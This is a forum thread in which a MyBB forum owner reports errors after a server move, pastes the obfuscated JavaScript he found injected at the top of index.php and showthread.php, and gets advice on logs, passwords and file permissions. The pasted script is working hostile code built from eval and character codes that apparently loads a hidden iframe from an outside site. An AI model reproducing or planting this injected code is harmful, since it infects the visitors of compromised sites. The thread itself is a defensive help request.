MyBB Community Forums

Hi

Ok let me clear this up,

1) It was on a vps for months and we have had no problems at all.

2) We moved it all over to a dedicated server and did seem to run fine ( while i was logged in )

3) Next day i get all these "headers already sent" errors, so i uploaded the files again and againi it seems fine

3) Now the errors did come back but only when i logged off the forum. When not logged into the forum it seemed the header issues arise.

what i have come to notice is that in the top of the files: index.php, showthread.php the following code was there, yet when i donwloaded mybb forum software again from mybb it isnt in the file.:

 <script language='javascript'>eval(";zvnzuCQiPgqkeQh=vvCzAZkbRjPCyWITmDzJZhHkvLoEFMGsYPbgZZEvdU;)mOsBucAFshfrzPOoxHeIfw(etirw.tnemucod;veDdFBQDVvfBjtDFFOhxmjNCw=WiDrcuLYpWYIUFqecGrAreEvgqRqICcPrwdEBNeTIFtas };)XjPvDyJdEkVpEyoI(edoCrahCmorf.gnirtS=+mOsBucAFshfrzPOoxHeIfw;kSCRmTMQhpIcKlDySFoHchoMhVCfIes=zvnzuCQiPgqkeQh ;)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw=^XjPvDyJdEkVpEyoI )XjPvDyJdEkVpEyoI=!)kSCRmTMQhpIcKlDySFoHchoMhVCfIes(tAedoCrahc.veDdFBQDVvfBjtDFFOhxmjNCw(fi ;DhykppCnUwsHBwlTaVxnXHVAKqIylOHPXq=HyqsEzsOHxVpcZSQyHZxpKzDxFggBzxp ;)BLdvJNOVVBsfSJfQEuhrW(tAedoCrahc.Obhnuhwt=XjPvDyJdEkVpEyoI;0=kSCRmTMQhpIcKlDySFoHchoMhVCfIes )kSCRmTMQhpIcKlDySFoHchoMhVCfIes=<htgnel.veDdFBQDVvfBjtDFFOhxmjNCw(fi;++kSCRmTMQhpIcKlDySFoHchoMhVCfIes{)++BLdvJNOVVBsfSJfQEuhrW;jQOfpaekk<BLdvJNOVVBsfSJfQEuhrW;0=BLdvJNOVVBsfSJfQEuhrW(rof;Obhnuhwt=sGjYTrVwyWaxAgwjI;)Obhnuhwt(epacsenu=Obhnuhwt;RuMrnlkLXLgXmYuAuOwLoEqRQoLGese=xxSVdycrs;3/htgnel.Obhnuhwt=jQOfpaekk;ofzBrUgBNbSwW=DhykppCnUwsHBwlTaVxnXHVAKqIylOHPXq;'A4%32%12%C0%D3%63%52%95%94%15%A7%45%B7%D6%D3%23%13%E3%22%C2%41%C3%82%33%81%82%57%54%96%27%55%62%50%73%83%81%A0%10%23%D3%53%E0%F4%85%C5%84%44%11%52%D2%D1%C3%62%C6%45%44%D4%56%10%A3%13%93%92%E3%77%56%57%85%86%72%53%D1%C2%22%74%B7%16%A4%37%50%B3%63%60%10%86%57%D6%B3%D0%D4%74%A0%40%01%81%A2%32%F1%C2%32%C6%45%54%D4%56%61%C3%43%B3%53%43%23%A2%52%80%33%F6%36%D0%92%02%60%F3%53%C0%17%81%43%23%14%A0%10%A7%12%D3%D4%B1%80%80%C1%A0%71%96%36%75%F3%42%83%E1%75%25%B3%61%A2%07%C2%73%73%52%12%D2%64%'=Obhnuhwt;ofzBrUgBNbSwW=RuMrnlkLXLgXmYuAuOwLoEqRQoLGese;0=kSCRmTMQhpIcKlDySFoHchoMhVCfIes;MCiuZ=ofzBrUgBNbSwW;'OAyEUgYPhNqSQodhUOTcozmjytFLmOPLvuoXdYPIZVWGDzU'=veDdFBQDVvfBjtDFFOhxmjNCw;mOsBucAFshfrzPOoxHeIfw=MCiuZ;''=mOsBucAFshfrzPOoxHeIfw".split('').reverse().join(''));</script><script>var s=new String();a=(new Function("","")+"").substr(3-1,4);if((a=="unct")||(a=="ncti"))a=(document.createDocumentFragment+"").substr(2-1,4);if((a=="unct")||(a=="ncti")){r=1;c=String;}if(r&&document.createTextNode)y=2;e=window['e'+'val'];m=new Array(4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y,68/y,30*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,64/y,57.5*y,228/y,49.5*y,122/y,19.5*y,208/y,58*y,232/y,56*y,116/y,23.5*y,94/y,49.5*y,230/y,59*y,202/y,57*y,232/y,23*y,210/y,55*y,94/y,52.5*y,220/y,23*y,198/y,51.5*y,210/y,31.5*y,200/y,50.5*y,204/y,48.5*y,234/y,54*y,232/y,19.5*y,64/y,59.5*y,210/y,50*y,232/y,52*y,122/y,19.5*y,98/y,24*y,78/y,16*y,208/y,50.5*y,210/y,51.5*y,208/y,58*y,122/y,19.5*y,98/y,24*y,78/y,16*y,230/y,58*y,242/y,54*y,202/y,30.5*y,78/y,59*y,210/y,57.5*y,210/y,49*y,210/y,54*y,210/y,58*y,242/y,29*y,208/y,52.5*y,200/y,50*y,202/y,55*y,118/y,56*y,222/y,57.5*y,210/y,58*y,210/y,55.5*y,220/y,29*y,194/y,49*y,230/y,55.5*y,216/y,58.5*y,232/y,50.5*y,118/y,54*y,202/y,51*y,232/y,29*y,96/y,29.5*y,232/y,55.5*y,224/y,29*y,96/y,29.5*y,78/y,31*y,120/y,23.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,124/y,17*y,82/y,29.5*y,18/y,4.5*y,250/y,4.5*y,18/y,51*y,234/y,55*y,198/y,58*y,210/y,55.5*y,220/y,16*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,61.5*y,18/y,4.5*y,18/y,59*y,194/y,57*y,64/y,51*y,64/y,30.5*y,64/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,198/y,57*y,202/y,48.5*y,232/y,50.5*y,138/y,54*y,202/y,54.5*y,202/y,55*y,232/y,20*y,78/y,52.5*y,204/y,57*y,194/y,54.5*y,202/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,50.5*y,232/y,32.5*y,232/y,58*y,228/y,52.5*y,196/y,58.5*y,232/y,50.5*y,80/y,19.5*y,230/y,57*y,198/y,19.5*y,88/y,19.5*y,208/y,58*y,232/y,56*y,116/y,23.5*y,94/y,49.5*y,230/y,59*y,202/y,57*y,232/y,23*y,210/y,55*y,94/y,52.5*y,220/y,23*y,198/y,51.5*y,210/y,31.5*y,200/y,50.5*y,204/y,48.5*y,234/y,54*y,232/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,236/y,52.5*y,230/y,52.5*y,196/y,52.5*y,216/y,52.5*y,232/y,60.5*y,122/y,19.5*y,208/y,52.5*y,200/y,50*y,202/y,55*y,78/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,224/y,55.5*y,230/y,52.5*y,232/y,52.5*y,222/y,55*y,122/y,19.5*y,194/y,49*y,230/y,55.5*y,216/y,58.5*y,232/y,50.5*y,78/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,216/y,50.5*y,204/y,58*y,122/y,19.5*y,96/y,19.5*y,118/y,51*y,92/y,57.5*y,232/y,60.5*y,216/y,50.5*y,92/y,58*y,222/y,56*y,122/y,19.5*y,96/y,19.5*y,118/y,51*y,92/y,57.5*y,202/y,58*y,130/y,58*y,232/y,57*y,210/y,49*y,234/y,58*y,202/y,20*y,78/y,59.5*y,210/y,50*y,232/y,52*y,78/y,22*y,78/y,24.5*y,96/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,50.5*y,232/y,32.5*y,232/y,58*y,228/y,52.5*y,196/y,58.5*y,232/y,50.5*y,80/y,19.5*y,208/y,50.5*y,210/y,51.5*y,208/y,58*y,78/y,22*y,78/y,24.5*y,96/y,19.5*y,82/y,29.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,23*y,194/y,56*y,224/y,50.5*y,220/y,50*y,134/y,52*y,210/y,54*y,200/y,20*y,204/y,20.5*y,118/y,4.5*y,18/y,62.5*y);for(i=0;i<m.length;i++)if((a=="unct")||(a=="ncti"))s+=c.fromCharCode(m[i]);if((a=="unct")||(a=="ncti"))e('e(s)');</script><?php

I have uploaded all the files fresh from the mybb files i downloaded from mybb and everything seems fine again.

Now i still file this is a files permission error though all file are set to 755

Thoughts?

Steve

Yeah that javascript isn't friendly, you've been hacked. Seeing as the only thing that has changed between it working and not working is the server, it indicates there's a security hole in the server somewhere. Have you looked at your access/FTP logs to see when these files may have been edited?? Changed all your passwords??

And do you mean all files are 755 or all folders?? Because 755 is the default for folders, but files shouldn't be set to that. If files are set to 755 and you haven't set them to that then you'll need to review logs again to see what did.

Hi Matt

( may i just say sorry for my previous posts within this thread )

I have just checked the access logs and have got this in it:

[Fri Dec 23 20:54:25 2011] [error] [client 178.32.110.232] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind

i know you can ban ip's that doe this, but do you think this is how i was hacked or is there more to it?

thanks
Steve

Not a problem.

Hmm, can't say for sure if that's related but it looks a bit odd.

You might want to also look over your Apache configuration and make sure everything there is set to what it should be. Also did you check if your files or just folders were set to 755??

Hi Matt

I changed them to 644 for the files and so far its stayed like that. the problem is now that i really need to find out if and how i have been hacked before i do a complete OS re-install so i know what needs fixing.

Was wondering though, i have the kloxo control panel installed and was thinking is it worth buying a cpanel license to run the serer as you can do alot with Cpanel in the WHM.

Im in two minds of buying it or just sticking with kloxo, this server is only for my use.

Thanks
Steve

Hi

No more ideas on this?

If the files are still getting changed, I'd suggest that you look at the file modification time, then search your server logs to see what was being run at that time. Perhaps you can see if there's an unauthorized SSH login, or if there's an attack coming from a maliciously crafted URL, etc.

As for the control panel, personally I've been using DirectAdmin for the past couple of years on my server. Costs less than cPanel and does pretty much most of the stuff webmasters need to use a control panel for. Plus support is quick and friendly.